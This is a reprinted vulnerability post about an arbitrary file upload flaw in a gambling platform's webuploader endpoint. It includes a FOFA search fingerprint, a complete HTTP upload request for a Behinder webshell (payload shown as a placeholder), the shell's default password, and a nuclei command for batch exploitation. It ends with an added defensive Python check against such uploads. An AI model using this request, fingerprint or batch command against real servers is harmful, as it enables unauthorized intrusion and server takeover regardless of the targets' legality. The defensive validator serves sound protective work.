Title: Arbitrary file upload vulnerability in a certain gambling ("spinach") system

0x01 Vulnerability Description

Online gambling refers to gambling activities conducted over the Internet (illegal gambling websites, gambling ("spinach") apps, WeChat groups, etc.). Because online gambling is illegal and the funds are not protected by law, there are many "scam-making" behaviors. Many people do not dare call the police after being cheated, and their families are destroyed as a result. Cracking down on gambling is therefore urgent. A certain gambling system has an arbitrary file upload vulnerability. An attacker can upload Trojan files through it, which leads to compromise of the server.

0x02 Vulnerability reproduction

fofa: body='main.e5ee9b2df05fc2d310734b11cc8c911e.css'

1. Send the PoC request to upload the Ice Scorpion (Behinder) webshell; the response returns the upload path

POST //statics/admin/webuploader/0.1.5/server/preview.php HTTP/2
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User:1
If-Modified-Since: Mon, 05 Sep 2022 01:19:50 GMT
If-None-Match: '63154eb6-273'
Te: trailers
Content-Type: application/x-www-form-urlencoded
Content-Length: 746

data:image/php;base64,<base64-encoded PHP webshell>

2. Connect with Ice Scorpion (Behinder) to get a webshell

Ice Scorpion default connection password: rebeyond

3. The nuclei batch verification script has been published on Knowledge Planet (there are many assets)

nuclei.exe -t bocaijngj_upload.yaml -l subs.txt -stats

Reprinted from the original link: https://mp.weixin.qq.com/s?__biz=MzkyMTMwNjU1Mg==mid=2247486261idx=1sn=2ea324e5b3b895bd500a509bd15ae90fchksm=c184dfe2f6f356f47a5f80d045fac890227a508488b23898482ce4f9daa91fecc54d2f83629scene=178cur_album_id=2581677939042598912#rd
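
A defensive check for the upload pattern in the request above, as an added example that is not part of the original post: it validates a data-URI upload body against an image allowlist and magic bytes before anything is written to disk. The function name, the allowlist and the sample bodies are constructed for illustration, and it assumes the endpoint receives the data URI as the raw POST body.

```python
import base64
import binascii
import re

# Assumption: the endpoint receives the data URI as the raw POST body.
DATA_URI = re.compile(r"^data:image/([\w.+-]+);base64,(.*)$", re.DOTALL)

# Allowlisted image subtypes and their leading magic bytes.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpeg": (b"\xff\xd8\xff",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

def inspect_upload(body: str) -> list:
    """Return the reasons an upload body should be rejected ([] = accept)."""
    m = DATA_URI.match(body.strip())
    if not m:
        return ["not an image data URI"]
    subtype, payload = m.group(1).lower(), m.group(2)
    reasons = []
    if subtype not in MAGIC:
        reasons.append("subtype %r is not an allowed image type" % subtype)
    try:
        raw = base64.b64decode(re.sub(r"\s+", "", payload), validate=True)
    except (binascii.Error, ValueError):
        return reasons + ["payload is not valid base64"]
    # startswith(()) is False, so unknown subtypes also fail this check.
    if not raw.startswith(MAGIC.get(subtype, ())):
        reasons.append("content does not match the declared image type")
    # Catches PHP appended to a valid image header (polyglot files).
    if b"<?php" in raw.lower():
        reasons.append("decoded content contains a PHP open tag")
    return reasons

def _uri(subtype: str, raw: bytes) -> str:
    return "data:image/%s;base64,%s" % (subtype, base64.b64encode(raw).decode())

# Constructed sample bodies (harmless placeholders, not from the post).
PNG_OK = _uri("png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
PHP_TYPE = _uri("php", b"<?php /* constructed placeholder */ ?>")
POLYGLOT = _uri("gif", b"GIF89a<?php /* constructed placeholder */ ?>")

if __name__ == "__main__":
    for name, body in [("png", PNG_OK), ("php", PHP_TYPE), ("gif+php", POLYGLOT)]:
        print(name, inspect_upload(body) or "accept")
```

The same allowlist belongs in the server-side handler, which should choose the stored file extension itself rather than take it from the client-supplied subtype.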
